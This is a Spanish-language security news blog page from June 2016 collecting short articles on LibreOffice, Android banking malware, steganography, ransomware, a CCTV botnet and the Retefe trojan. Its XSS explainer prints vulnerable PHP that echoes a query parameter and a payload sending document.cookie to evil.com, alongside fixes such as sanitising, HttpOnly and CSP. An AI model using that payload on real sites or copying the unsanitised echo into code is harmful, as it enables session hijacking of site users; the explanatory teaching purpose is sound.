Thursday 30 June 2016

LibreOffice igual de vulnerable que Microsoft Office

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/vulnerabilidades/libreoffice-igual-de-vulnerable-que-microsoft-office/
TAGS: LibreOffice, Microsoft Office

Siempre estamos dando vueltas a la seguridad de los programas que utilizamos. LibreOffice es una de las suite más conocidas y alternativa a la de Microsoft. Expertos en seguridad han demostrado que la seguridad en ambas soluciones es muy similar, existiendo casi los mismos problemas de seguridad tanto en una como en la otra.


Los expertos creen que la confianza de los usuarios en los productos Open Source puede desembocar en un problema mayor, ya que estos hacen uso de este tipo de software porque además de ser gratuito creen que están expuestos en menor medida a los ciberdelincuentes y ataques informáticos.


Evidentemente tienen parte de razón, ya que es probable que la exposición sea menor, pero esto viene determinado por la cuota de mercado que también es inferior. Sin ir más lejos, lo que sucede en la actualidad con Apple es un claro ejemplo de esto que estamos diciendo.


Sin ir más lejos, hace relativamente poco tiempo se detectó en 7-ZIP y Graphite vulnerabilidades de seguridad importantes que comprometían la seguridad de los equipos de los usuarios.


libreoffice_main



CVE-2016-4324 se utiliza para parsear archivos RTF de forma errónea


Esta en la última vulnerabilidad detectada en la suite de ofimática Open Source que permite utilizar los archivos RTF mal formados para comprometer la seguridad del equipo. Aunque sí que es verdad que para hacer uso de ella de forma satisfactoria se debe hacer uso de un segundo software, por lo que explotarla no resulta tan trivial.



Un número importante de bugs lo pueden convertir en un objetivo


Expertos en seguridad añaden que no es necesario disponer de una gran cartera de usuarios si dispones de los recursos necesarios, es decir, vulnerabilidades. Expertos afirman que no conviene fiarse de que el software sea Open Source, ya que puede ser tan vulnerable o más que cualquier otro de pago.


La vulnerabilidad citada con anterioridad afecta por igual a la versiones disponibles para Windows, Linux y Mac OS X, existiendo una actualización disponible para solventar este problema.


Fuente:http://www.redeszone.net/


Noticias de seguridad informática

Nuevo malware para Android se hace pasar por Whatsapp

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/hacking-incidentes/nuevo-malware-para-android-se-hace-pasar-por-whatsapp/
TAGS: android, Google Play, nuevo malware, uber, WhatsApp

Android es la plataforma móvil que más sufre de infecciones de malware, pese a los esfuerzos de Google por mejorar la seguridad de Android versión tras versión otros factores como la popularidad de la plataforma, la fragmentación que sufre (coexistencia de diferentes versiones) y factores propios del sistema que facilitan estas infecciones no permiten que Android se libre de esta carga que arrastra ya desde hace tantos años.


En esta ocasión os informamos de un nuevo malware que ha surgido en Europa,un malware destinado a infectar a usuarios de Android y que tiene el objetivo de hacerse con nuestros datos bancarios para robarnos fondos así como lucrar a sus creadores.



¿Cómo se distribuye?


Imagen - Nuevo malware para Android se hace pasar por Whatsapp


Este nuevo malware, detectado por la firma de seguridad FireEye, se transmite utilizando técnicas de phishing vía SMS, es decir, utilizando el servicio de SMS se hace pasar por otras entidades o intenta engañar al usuario para entrar a una web o descargar algo.


En Android es fácil que esto infecte al usuario dado que muchos tienen activada la casilla “Orígenes Desconocidos”, una opción que permite instalar aplicaciones desde fuera de Google Play y que de estar desactivada mejoraría bastante la seguridad de sus terminales.



¿Que hace este nuevo malware?


Imagen - Nuevo malware para Android se hace pasar por Whatsapp


Una vez instalado en el dispositivo, de forma totalmente silenciosa, se instala sobre aplicaciones populares como Whatsapp, Uber e incluso la tienda de aplicaciones oficial de Google, Google Play, aplicaciones que de estar instaladas en el terminal lo más probable es que el usuario las utilice varias veces al día.


Cuando está instalado, aplica sobre cada aplicación infectada una nueva capa que imita la interfaz de cada una, pero que en su lugar pide datos de nuestras tarjetas de crédito o cuentas bancarias, supuestamente por algún motivo relacionado con la aplicación, como puede ser la compra de una app en Google Play o el pedir un coche a través de Uber.


Cuando los datos son introducidos estos se envían al responsable de este malware, que puede utilizarlos de muchas formas, ya sea realizando cargos en la cuenta bancaria poco a poco, realizando un gran cargo e incluso vendiendo esos datos a terceros a través del mercado negro (o la deep web).



¿Cómo protegernos ante este malware?


Imagen - Nuevo malware para Android se hace pasar por Whatsapp


Hay diferentes recomendaciones que pueden ayudar de forma acumulativa a evitarte disgustos por infección de este tipo de malware:


- Desactiva “Orígenes Desconocidos”: Desde los ajustes de tu dispositivo, dirígete a “Seguridad” o “Privacidad” según la versión de Android que tengas instalada y la capa de personalización que utilice, y posteriormente deja esta casilla sin rellenar, es decir, desactivada.


- No piques con los sms: Si recibes un sms diciendo que descargues esto o entres en esta web, asegúrate de que quien lo envía es de fiar, y en caso de duda consulta a alguien que creas que puede ayudarte.


- No des fácilmente tu información bancaria: Identifica bien cuando es realmente necesaria, en caso de duda acude a alguien que creas que puede ayudarte a identificarlo y por seguridad investiga si puedes utilizar métodos de seguridad existentes en tu banco como tarjetas virtuales, así como estar pendiente a los cargos que se te puedan realizar e informar de manera inmediata a tu banco si detectas actividad inusual.


- Ten siempre instalada la última versión de Android compatible con tu dispositivo: Google va mejorando la seguridad de Android en la medida de lo posible corrigiendo fallos de seguridad y poniendo más barreras a los hackers, todo esto ayudará a que tu versión de Android sea menos propensa a caer infectada al imponer de mejores y más actuales medidas de seguridad.


- Utiliza algún antivirus puntualmente: No confíes plenamente en este tipo de aplicaciones, no son 100% eficaces y no merece la pena mermar el rendimiento de tu dispositivo así como pagar por tener una protección que puede fallarte, lo mejor que puedes hacer es instalar un antivirus gratuito desde Google Play de alguna firma conocida (como Avast, BitDefender, F-Secure, Eset, Symantec, Baidu, etc… ) y realizar análisis programados cada semana o manualmente cuando creas que puede haber algún peligro, de esta forma te ahorras pagar por algo que puede no servirte y tener garantías de una seguridad ligeramente mejorada.


Siguiendo estas indicaciones y con un poco de cabeza (leyendo todas las advertencias que nuestro smartphone nos lanza sin pulsar en aceptar sin haber leído, así como desconfiando de alertas mal escritas o con aspecto dudoso que pueden ser falsas alertas generadas por una web) debería ser suficiente para evitar la gran mayoría de infecciones.


Fuente:http://www.elgrupoinformatico.com/


Noticias de seguridad informática

La segunda juventud de la esteganografía como medio para ocultar malware

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/seguridad-informatica/la-segunda-juventud-de-la-esteganografia-como-medio-para-ocultar-malware/
TAGS: esteganografía, Malware

La esteganografía, una técnica milenaria para ocultar información vuelve a utilizarse en el marco de lo digital. Entre sus fines está el malware o el simple refuerzo de nuestra privacidad online. Esta es su historia.


Una foto de un precioso paisaje, una imagen GIF de un gatito o mono cayendo de un árbol. Hay cientos de métodos para enviar información oculta y cifrada con origen y fin criminal en Internet. Utilizar estas estampas bellas o graciosas es solo uno de los más extendidos. La esteganografía es una antigua forma de transmitir información oculta de más de 2.000 años de antigüedad y está más vigente que nunca. Las aplicaciones son muchas, entre ellas traspasar contenido pornográfico, instrucciones a terroristas o introducir virus mediante malware. Así que cuidado con esa última fotografía felicitándote el año nuevo que tantas ganas tienes de abrir. Quién sabe, igual eres lo suficientemente importante como para que seas el destinatario de este tipo de infección.


Hoy en día, los criminales, los piratas informáticos, los terroristas y espías se basan en este tipo de técnicas de información oculta. Cuantas más capas y los pasos que se necesita para enviar un mensaje secreto, mejor para eludir los firewalls y expertos en seguridad. Eso sí, estas técnicas no se limitan únicamente a introducir malware en los ordenadores. Una forma completamente nueva de comunicación crece en Internet, permitiendo a la gente a enviar cualquier cosa, desde una canción, un PDF de un libro prohibido o un archivo pornográfico oculto en el interior otros archivos de inocua de apariencia.


Una imagen válida para introducir malware mediante el uso de técnicas de esteganografíaUna imagen válida para introducir malware mediante el uso de técnicas de esteganografía



¿Qué es la esteganografía y cuándo aparece?


La esteganografía (steganos+graphos; oculto+escritura) es una técnica que se inició en la antigua Grecia que nos permite entregar mensajes camuflados dentro de un objeto o contenedor. De esta manera lo que queremos enviar no es detectado y pasa inadvertido. Esta forma de comunicación oculta se ha utilizado durante toda la historia humana hasta nuestros días. Tenemos el ejemplo de China en la época de las dinastías. Eran comunes las guerras en campañas de conquista, y en muchas ocasiones se debían transmitir mensajes de un lugar a otro. Se solía escribir sobre seda fina que comprimían hasta convertirla en una pequeña bola que el receptor se tragaba. El canal utilizado era un soldado o esclavo que transportaba el mensaje hasta su destinatario.


Plinio el Viejo fue un escritor y naturalista romano del siglo I antes de Cristo que describió técnicas para escribir mensajes ocultos, invisibles, gracias a la utilización de leche de algunas plantas. El uso de tintas invisibles ya era común en la antigüedad. En la época de la Inquisición española se conocía el uso de jugos cítricos como el limón para transcribir mensajes que no fueran perceptibles al ojo humano a no ser que se incidiera sobre el mensaje calor o luz. El primer libro que hablaba abiertamente de la esteganografía fue escrito por el monje alemán Johannes Trithemius en el Siglo XVI. En Steganographia, el considerado como precursor de la criptografía moderna trataba temas como la ocultación de la información.


Un código esteganográfico escondido en este textoUn código esteganográfico escondido en este texto / [National Library of Wales] editada con licencia CC 1.0


Hoy en día, la utilización de esta técnica en medios digitales es difícil de detectar ya que, como asegura en Atlas Obscura el científico de la Universidad Tecnológica de Varsovia, Wojciech Mazurczyk, si el usuario ve algo y no sabe de antemano que hay algo oculto, no tiene ningún sentido sospechar que algo puede estar pasando. Un ejemplo de esta técnica aportada por la tesis 'Aplicaciones de la esteganografía en la seguridad informática' de Héctor Fabio Villa y Juan Camilo muestra cómo se puede ocultar la letra 'A' en solo tres píxeles de una imagen que cuenta con un formato RGB (3 bytes).







Píxeles originales de la imagen
(1 1 0 1 1 0 1 0) (0 1 0 0 1 0 0 1) (0 1 0 0 0 0 1 1)
(0 0 0 1 1 1 1 0) (0 1 0 1 1 0 1 1) (1 1 0 1 1 1 1 1)
(0 0 0 0 1 1 1 0) (0 1 0 0 0 1 1 1) (0 0 0 0 0 1 1 1)

El mensaje a cifrar, la letra 'A' se representa en ASCII como esta lista de números: (1 0 0 1 0 1 1 1). La representación de los píxeles alterados sería de esta manera.







Pixeles alterados de la imagen
(1 1 0 1 1 0 1 1) (0 1 0 0 1 0 0 0) (0 1 0 0 0 0 1 0)
(0 0 0 1 1 1 1 1) (0 1 0 1 1 0 1 0) (1 1 0 1 1 1 1 1)
(0 0 0 0 1 1 1 1) (0 1 0 0 0 1 1 1) (0 0 0 0 0 1 1 1)

Cada píxel cambia tres de cada 24 bits, una cantidad minúscula que probablemente pasaría desapercibida en la mayoría de los controles debido a su poco peso. Es solo un ejemplo, pero ocultar esta letra serviría de base para hacer lo mismo con otros mensajes más largos.



Origen digital de pornografía infantil y terrorismo


Para hablar de la esteganografía aplicada al malware debemos centrarnos en su inicio en la época digital a principios de los años noventa. El programa S-Tools se utilizó para ocultar pornografía infantil dentro de diferentes archivos digitales entre 1998 y el año 2000, era el germen de esta técnica en un mundo digital. Los ataques mediante esta técnica no acabaron ahí. Recientemente se ha sabido que los yihadistas utilizan esta técnica en España (y en todo el mundo) para llevar mensajes a sus destinatarios, para captar. En una entrevista a El País, un informático aseguraba que era muy común la ocultación de ese tipo y que, además, utilizan servidores occidentales para almacenar esa información. Indica, incluso, que esos servidores desconocen la información que contienen y que, cuando se les avisa de un cierto tipo de dato comprometido, ya ha sido replicado en tantos servidores que es imposible eliminarlo por completo.


En 2014 se detectaron las primeras incursiones de un troyano llamado Zeus VM, una variante de Zeus, otro malware anterior del que nacieron multitud de variantes y copias debido a su éxito. VM  llevaba ya unos meses infectando Internet, probablemente desde el año 2013 y la IP era de origen ruso. En Malwarebytes se hicieron eco del peligro de este virus, que utillizaba herramientas de esteganografía (en este caso imágenes de paisajes preciosos) para infectar. Se distribuía mediante correos electrónicos o directamente ataques a webs. Permitía recopilar información personal de los usuarios para poder hacer transacciones en línea. Gracias a pasar desapercibido con esas imágenes, que contenían una lisat de secuencias de comandos, monitorizaba el PC de la víctima y toda su actividad.


Desde el código binario también se puede esconder informaciónDesde el código binario también se puede esconder información



Los ejemplos de Deep Sound y Hammertoss


Los canales posibles son decenas, desde los mensajes en redes sociales hasta el más simple correo electrónico. Cualquier método es válido para pasar datos e informaciones ocultas, sea cual sea el fin último. Hamertoss ha sido el último ejemplo de esta unión de la esteganografía con lo digital y el malware. El virus creado por el grupo APT29 consiguió obtener información de empresas a principios de 2015 a través de Twitter, GitHub y servicios de almacenamiento en la nube. Se ocultaba en imágenes de apariencia inocente, como paisajes o animales.


Ciudado con los archivos que descargas en InternetCiudado con los archivos que descargas en Internet


Por otra parte tenemos el ejemplo de una aplicación que facilita la ocultación de datos. Es Deep Sound, un software que se puede descargar en Windows y que está diseñada específicamente para tratar de ocultar información dentro de un fichero musical MP3. El programa permite que escojamos la canción portadora del mensaje que queremos transmitir y luego se añade el texto interno que debemos encriptar. A medida que el mensaje crece también lo hace el peso del archivo y depende el usuario realizar un envío de mensaje disimulado u otro con mayor carga, que sería fácilmente detectable.


https://www.youtube.com/watch?v=UE9suwyuic8

Los hackers escondidos: un tema actual y candente


Desde Secure Works también se hacen eco de la técnica y de cómo la utilizan los hackers para llegar a obtener información o directamente infectar una plataforma digital. En el Black Hat Europe 2015, una conferencia sobre seguridad en la red, Pierre-Marc Bureau y Christian Dietrich revelaron cómo los atacantes están ocultando su rastro en sus acciones. Indicaban que la esteganografía había resurgido gracias a lo digitaly que en la actualidad es una técnica al alza. Indicaron también que la ventaja de la esta técnica es que la comunicación entre un equipo infectado el origen es muy difícil de detectar, tanto para bots de rastreo como por humanos; señalando varias técnicas relacionadas con esta acción delictiva:



  1. Stegoloader es un software que permite esconder el código o lo que queramos enviar en imágenes PNG.

  2. Lurk trata de ocultar diversas direcciones URL de Internet en otro formato, esta vez el BMP.

  3. Gozi, por último, se encarga de disimular dominios de control del servidor en archivos ICO.

Las agencias gubernamentales deben estar al tanto de los nuevos estallidos de malwareLas agencias gubernamentales deben estar al tanto de los nuevos estallidos de malware / [The National Crime Agency]editada con licencia CC 2.0



La ocultación de la identidad con fines lícitos


Bien es cierto que no todas las personas que utilizan este tipo de técnicas tienen un fin delictivo o peligroso, incluso hay expertos que utilizan parte de la idiosincrasia de este tipo de virus para un beneficioso fin. Estas personas utilizan parte de las técnicas del malware y la ocultación propias de la esteganografía para poder ofrecer a usuarios seguridad total en la red. De esta manera aseguran su privacidad gracias a la web profunda y programas como Tor. Los clientes que utilizan este software acceden a un nuevo abanico de posibilidades en una web que dificulta mucho más el rastreo y proporciona un anonimato que no es posible en la web típica. Esta dualidad de fines es una constante en el mundo de Internet, pues se utilizan las mismas técnicas para realizar todo tipo de acciones, unas más lícitas y otras directamente criminales.


Fuente:http://www.malavida.com/


Noticias de seguridad informática

Wednesday 29 June 2016

Una app maliciosa para Android roba datos de Viber

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/hacking-incidentes/una-app-maliciosa-para-android-roba-datos-de-viber/
TAGS: Android.Vibleaker, viber

Concretamente es la aplicación Beaver Gang Coulter la que lleva a cabo esta acción y que se puede obtener en la Google Play Store sin ningún problema. Por desgracia, esto no es nada más que otra muestra de que los filtros no funcionan de forma correcta y que suponen un problema para los usuarios. Las fotos y los vídeos de Viber corren peligro.


Y es que ni siquiera descargando de esta se está libre de malware, algo que parece evidente, ya que estos no son infalibles, pero sí que es verdad que la frecuencia con la que sucede estos demasiada, repercutiendo de forma negativa en la confianza del usuario. Esto es la tónica dominante en tiendas de aplicaciones alternativas, pero no debería serlo en la oficial.


Según los expertos en seguridad de Symantec, cuando la amenaza llega al equipo se encarga de cumplir órdenes que se envían de forma remota, analizando el equipo en busca de vídeos y fotos de la aplicación Viber. Aunque sí que es verdad que esta ha perdido atractivo de cara a los usuarios, son muchos los que hacen uso de ella para comunicarse con sus amigos o familia, enviando en algún momento archivos que son lo que buscan los ciberdelincuentes.


Logo-de-Viber



Android.Vibleaker actúa contra Viber pasado un tiempo


Volvemos otra vez a encontrarnos con una amenaza que no realiza el ataque de primeras, sino que permanece en estado latente hasta que los ciberdleincuentes propietarios deciden despertarlo y que comience a examinar el sistema. Esto era bastante habitual en sistemas operativos de escritorio para que las herramientas de seguridad no fuesen conscientes de la presencia del malware.


Los expertos en seguridad aún tienen pendiente analizar en profundidad esta amenaza.



Miles usuarios afectados


De nuevo se cuentan por miles los usuarios afectados por una amenaza de la Google Play Store y parece que es algo a lo que habrá que acostumbrarse. Por desgracia para el usuarios los comentarios son poco indicativos, ya que como suele suceder, los ciberdelincuentes los manipulan ara aumentar la reputación de la aplicación.


Fuente:http://www.redeszone.net/


Noticias de seguridad informática

¿Qué es Cross Site Scripting y cómo solucionarlo?

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/importantes/que-es-cross-site-scripting-y-como-solucionarlo/
TAGS: seguridad de páginas web, seguridad web
¿Qué es Cross Site Scripting y cómo solucionarlo?

Cross Site Scripting es un tipo de ataque que se puede llevar a cabo para poner en peligro a los usuarios de una página web y seguridad de páginas web. La explotación de una falla XSS permite al atacante inyectar secuencias de comandos en el lado del cliente en las páginas web visitadas por los usuarios. A menudo se asume que significa JavaScript, pero también podría incluir, VBScript según expertos de seguridad web.

Los expertos de seguridad de páginas web dicen que es la vulnerabilidad más común, y muchos sitios son afectados. Se extiende desde pequeños sitios privados locales hacia gigantes como Google.

Impacto potencial sobre seguridad web


Debido a la capacidad de ejecutar JavaScript bajo el dominio del sitio, los atacantes son capaces de:
  • Leer todos los cookies, incluyendo los cookies de sesión. Al hacerlo, un atacante podría hacerse cargo de la sesión.

  • Ver cualquier cosa que el usuario ve, y robar información confidencial de este modo.

  • Cambiar lo que el usuario ve y manipular la información.

  • Básicamente hacer todo lo que un usuario normal puede, como el atacante puede ver y cambiar todo lo que presentan al usuario. Esto incluye la derivación de todas las protecciones CSRF implementadas para seguridad de páginas web. Para ponerlo en contexto; si el atacante con éxito pueda ejecutar el XSS, el atacante puede hacer todo lo que un administrador podría hacer.

  • Hacer cosas que el dominio vulnerable tiene acceso a hacer, lo que puede comprar el acceso a la cámara web del usuario, el micrófono o la ubicación.


Explotación de seguridad web


Cualquier fuente de datos que el navegador termina reproduciendo es un vector potencial de ataque. Esto significa que hay muchas maneras diferentes potenciales para explotar el sitio, y por lo tanto el riesgo de seguridad web aumenta.

Cross site scripting es considerado uno de los más fáciles tipos de vulnerabilidad para comprender. Dicho esto, no hay límites sobre lo complicado que puede ser, para explotar bajo diferentes circunstancias y protecciones según expertos de seguridad de páginas web.


¿Cómo descubrirlo?


Es posible categorizar las vulnerabilidades de XSS en diferentes sub categorías. Una de esas son las que sólo ponen en el cliente, en donde el propietario del sitio tendría que analizar todo el JavaScript para identificar todos los flujos de datos que se originan a partir de un usuario. En un primer momento, es fácil pensar en sólo los lugares normales, pero después de un tiempo, es obvio que hay muchos más vectores de los que se pensaba inicialmente.

Luego están los llamados reflected XSS que también afecta la seguridad de páginas web, que es cuando la página simplemente refleja algún tipo de entrada del usuario. Por ejemplo:

 

<?php echo $_GET[“g]; ?>

 

Sin embargo, también hay stored XSS que también afecta la seguridad de páginas web, en el que el servidor muestra algo que está en la base de datos. En resumen, se puede concluir que para descubrir el primer tipo mencionado necesitaría el propietario del sitio seguir el flujo de datos a lo largo de JavaScript para ver cómo trata la entrada del usuario. En este caso, la entrada del usuario pueden ser variables predeterminadas en JavaScript como location.hash, así como, por ejemplo, form-data. Para la segunda vulnerabilidad los expertos de seguridad web mencionan que el propietario del sitio tiene que buscar cada ubicación donde se imprimieron datos, e identificar la forma en que trataron, así como donde se originan. En los ejemplos de la vida real, no es raro ver a una combinación de estos tipos de vulnerabilidad.

 

Ejemplo de código de aplicación vulnerable


Suponga que un sitio tiene un cuadro de búsqueda con el código como el siguiente:

 

<?php // Code for performing the actual search } else  echo "Could not find any pages when searching for ".$_GET['query']; ?>

 

https://example.com/search.php?query=test

 

Could not find any pages when searching for test

 

Esto haría salida de la entrada del usuario directamente al documento HTML. Por lo tanto, si un usuario diera HTML como entrada sería necesario para al navegador a aceptar eso.

Por ejemplo, si tuviéramos que acceder

 

https://example.com/search.php?query=<script>// </script>

 

Eso daría lugar a lo siguiente que el navegador trataría de hacer.

No se pudo encontrar ninguna página en la búsqueda de

 

<script>alert(1)</script>

 

Esto es perfectamente válido HTML, y el script lo ejecutara.

 

Para mostrar el peligro de esto, imagina a un atacante consiguiendo que el usuario haga clic en un enlace como el siguiente:

 

https://example.com/search.php?query=<script>document.InnerHTML += "<img src='
http://evil.com?cookie="+document.cookie+"'>"</script>

 

El resultado sería este, que envía las cookies al atacante. Por ejemplo, fueron sesiones de identificación, un atacante podría secuestrar la sesión.

 

No se pudo encontrar ninguna página en la búsqueda de

<script>document.InnerHTML += "<img src='http://evil.com?cookie="+document.cookie+"'/>"</script>   

 

Deben sanitar las entradas de datos. La aplicación también debe desarrollarse con el riesgo de XSS en cuenta, y resolver las vulnerabilidades XSS. Dos de los métodos más conocidos de esto es HttpOnly y CSP. Pueden aprender más sobre cómo arreglar XSS durante el curso de seguridad web.

 
Noticias de seguridad informática

Tuesday 28 June 2016

Miles de dispositivos de video comprometidos para realizar ataques de DDoS

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/hacking-incidentes/miles-de-dispositivos-de-video-comprometidos-para-realizar-ataques-de-ddos/
TAGS: ataques de DDoS, CCTV

Investigadores hallaron una botnet con más de 25 mil dispositivos CCTV y grabadoras de video digital.





Atacantes comprometieron cerca de 25 mil dispositivos de video, entre los cuales se encuentran grabadoras de video digital (DVR) y cámaras de circuito cerrado (CCTV), para realizar ataques de Denegación de Servicio Distribuido (DDoS) en contra de sitios web.


Uno de los ataques, recientemente observado por investigadores de la firma Sucuri, tuvo como objetivo el sitio web de una pequeña tienda en línea de joyería. El ataque inundó de tráfico al sitio web con aproximadamente 50 mil peticiones HTTP por segundo, afectando la capa de aplicación o capa 7. Estos ataques fácilmente pueden afectar las operaciones de sitios pequeños debido a que la infraestructura dedicada al servicio sólo está implementada para manejar un pequeño número de consultas al mismo tiempo.



Los investigadores de Sucuri fueron capaces de identificar el origen del tráfico generado, que provenía de dispositivos CCTV y DVRs, debido a que muchos de ellos respondían a peticiones HTTP con el contenido “DVR Components Download”. Alrededor de la mitad de los dispositivos muestran como marcas un logotipo genérico en sus páginas, mientras que otros son más específicos entre los que se incluyen ProvisionISR, QSee, QuesTek, TechnoMate, LCT CCTV, Capture CCTV, Elvox, Novus y MagTec CCTV.


La botnet parece tener una distribución global, pero los países con más dispositivos comprometidos son Taiwan (24%), Estados Unidos (16%), Indonesia (9%), México (8%), Malasia (6%), Israel (5%) e Italia (5%).


No es muy claro cómo estos dispositivos fueron comprometidos, pero se sabe que los dispositivos CCTV cuentan con una débil seguridad en sus configuraciones. En marzo del presente año, un investigador de seguridad encontró la manera de ejecutar comandos de forma remota en dispositivos DVR en más de 70 diferentes proveedores. En febrero, investigadores  de  seguridad basada en riesgos realizó una estimación donde más de 45,000 dispositivos DVR de diferentes marcas usan la misma contraseña de administrador en sus equipos.


Fuente:http://www.seguridad.unam.mx/





Noticias de seguridad informática

Equipan al troyano bancario Retefe de un certificado digital válido

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/malware-virus/equipan-al-troyano-bancario-retefe-de-un-certificado-digital-valido/
TAGS: JavaScript, Malware

En los dos últimos años hemos disfrutado de campañas muy agresivas en las que este troyano bancario ha afectado de forma masiva a los usuarios. De nuevo este troyano bancario es noticia, sobre todo porque a Retefe lo han equipado con un certificado digital que permite por el momento pasar desapercibido durante su instalación.


Esto quiere decir que ni el sistema operativo Windows ni las herramientas de seguridad existentes opondrán resistencia a su llegada al equipo, algo que cada vez es más común y que viene fomentado por fallos de seguridad existentes en entidades certificadoras.


No es la primera vez ni será la última que se utilice un certificado robado, sobre todo porque una amplia mayoría de empresas no sabe que ha sido objeto de un robo hasta pasado unos meses o cuando ve que uno de sus certificados forma parte de una amenaza, como es el caso.


En lo que respecta al troyano bancario que nos ocupa, sus propietarios buscan de alguna forma hacerse con la mayor cantidad de credenciales de servicios de banca en línea y para eso se ayudan de un servidor proxy. Gracias a este que se configura en los equipos infectados el tráfico se desvía a páginas web propiedad de los ciberdelincuentes y así proceder al robo haciendo uso de páginas web falsas que se asemejan y mucho al de las principales entidades.



Retefe se distribuye haciendo uso de un archivo JavaScript


retefe troyano bancario


Parece que hoy en día también está de moda hacer uso de este lenguaje de programación para distribuir amenazas. Los usuarios reciben un correo electrónico con un archivo adjunto en el que podrán encontrar información relacionada con un cargo en una tarjeta, un tema que siempre despierta interés entre los usuarios y que provoca que intenten visualizar el contenido, algo que no es muy recomendable.


El archivo JS sirve para nada más y nada menos que llevar a cabo la descarga del verdadero instalador de la amenaza, pasando desapercibido gracias a este certificado que hemos mencionado con anterioridad. Una vez en el equipo, su actividad es silenciosa y transparente de cara al usuario, viéndose reflejada solo en que la navegación por Internet se ve ralentizada al pasar toda la navegación a través del proxy propiedad de los ciberdleincuentes.


Antes de introducir cualquier dato conviene revisar la dirección de la página en la que nos encontramos, evitando de esta forma que seamos víctimas de una estafa. En ese caso conviene modificar cuento antes la contraseña de la cuenta de los servicios afectados.


Fuente:http://www.redeszone.net/


Noticias de seguridad informática

Cuidado, la notificación de un comentario en el que nos han etiquetado en Facebook puede contener virus

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/seguridad-informatica/cuidado-la-notificacion-de-un-comentario-en-el-que-nos-han-etiquetado-en-facebook-puede-contener-virus/
TAGS: facebook, malware JavaScript

Cuando decimos que hoy en día vivimos conectados es porque rara es la persona que no sale de casa con su smartphone en el bolsillo. Un dispositivo con el que podemos conectarnos a Internet para navegar por la web, consultar el correo, etc. Pero sin duda, de entre todas las horas en las que estamos enganchados al móvil o delante del ordenador, buen parte de ese tiempo lo pasamos viendoqué ocurre a nuestro alrededor en las redes sociales.




En este sentido, Facebook es una de las redes sociales más populares y que cuenta con mayor número de usuarios activos cada mes. Esto hace que sea un blanco perfecto para los cibercriminales que quieren distribuir de forma rápida y a mucha gente su software malicioso.


Malware comentario Facebook



Puede llegarnos a través de una notificación de Facebook o por email


Según acabamos de conocer, una nueva estafa está circulando por la red social de Mark Zuckerberg. No, no se trata de la típica oferta en gafas de sol o el sorteo de un maravilloso coche, en esta ocasión un malware está infectando a numerosas víctimas a través de la distribución de una notificación en la aplicación de Facebook o en su correo electrónico.


Esta notificación en cuestión, hace referencia a que alguno de nuestros amigos nos ha etiquetado en un comentario que incluye un enlace. Pero mucho cuidado, ya que este enlace lo único que hace es descargar un malware en nuestro dispositivo o en el ordenador, ya que también se está distribuyendo a través de un mensaje de correo.


Según la fuente de la noticia, este malware está afectando sobre todo a los usuarios de Chrome, aunque no está claro si también los usuarios de otros navegadores como Firefox también pueden estar siendo afectados por la estafa, ya que se trata de un malware JavaScript que descarga una extensión de Chrome y algunos scripts AutoIt que probablemente incluyan algún tipo de ransomware que podría comportarse como el recién mencionado ransomware RAA del que puedes saber más desde este enlace.


Por lo tanto, si eres usuarios de Facebook, es recomendable que tomes mucha precaución a la hora de recibir alguna notificación o mensaje de correo que haga mención a un mensaje de uno de nuestros contactos que nos ha etiquetado en un comentario que incluye un enlace, ya que este podría hacer que se descargue el malware Javascript y seamos infectados con graves consecuencias.


Fuente:http://www.softzone.es/


Noticias de seguridad informática

Los expertos en seguridad describen el ransomware como una epidemia

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/malware-virus/los-expertos-en-seguridad-describen-el-ransomware-como-una-epidemia/
TAGS: Malware, ransomware

Sin lugar a dudas es una de las amenazas más comunes hoy en día y provoca grandes problemas a los usuarios. Estamos hablando de los ransomware, un software que cifra los archivos y que en muchos casos no permite llevar a cabo su recuperación. Por este motivo no han dudado en definirlo como una epidemia informática.


Lo que comenzó siendo un caso aislado se ha convertido en un problema muy frecuente, además de un negocio para el que posee una versión o se encarga de crear este tipo de software para posteriormente venderlo en el mercado negro. Fue en el año 2014 cuando comenzó el auge de este tipo de malware, y a pesar de que ya han pasado más de dos años este continúa al alza y no pasa una semana sin tener que hablar de una nueva.


Los primeros meses han sido complicados, porque ni los expertos en seguridad ni las empresas encargadas de desarrollar software antivirus sabían a qué se enfrentaban. Poco a poco las cosas se han normalizad y ahora resulta bastante frecuente que pasados unos días se consiga crear un software que permita obtener la clave de descifrado de los archivos o aprovechar un fallo de seguridad para recuperar el acceso a la información.


Podría decirse que el ransomware tiene su propio mercado y tal es la multitud de usuarios que sería conveniente indicar que se diferencian dos tipos de amenazas: las programadas de forma correcta y aquellas que están creadas por “aficionados” (por utilizar algún tipo de nombre). En estas que pertenecen a este último caso la posibilidad de éxito es grande con respecto a las primeras, aunque también hay que decir que por fallos en la programación se han dado casos de pérdida de la clave de cifrado y por lo tanto el acceso a los archivos.


CryptFlle2-BrLock-y-MM-Locker-nuevos-ransomware-detectados



Hacerse de oro gracias al ransomware


Seguro que la inmensa mayoría (por no decir todos) los usuarios conocen o han oído hablar en algún momento de estas amenazas. Los ciberdelincuentes saben que el pago de la recompensa es vital para hacer caja, de ahí que muchos hayan encontrado una forma de vida. Sin embargo, las copias de seguridad y las herramientas creadas por los desarrolladores juegan en su contra, de ahí que ahora busquen también atacar los volúmenes en los que las copias de seguridad puedan almacenarse.


Algunos estudios confirman que más de 4 millones de equipos se han visto afectados en algún momento por ransomware, encontrando estos principalmente en Estados Unidos y países de Europa.


Dirigida en un principio a usuarios particulares, su buen funcionamiento permitió trasladar la idea a empresas, o inclusos servicios públicos como hospitales, donde en el último año han conseguido sacar una suma importante de dinero.


Fuente:http://www.redeszone.net/


Noticias de seguridad informática

Monday 27 June 2016

BozoCrack y pybozocrack: Dos herramientas para crackear hashes MD5 buscándolos en Google

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/seguridad-informatica/bozocrack-y-pybozocrack-dos-herramientas-para-crackear-hashes-md5-buscandolos-en-google/
TAGS: Bozocrack, MD5

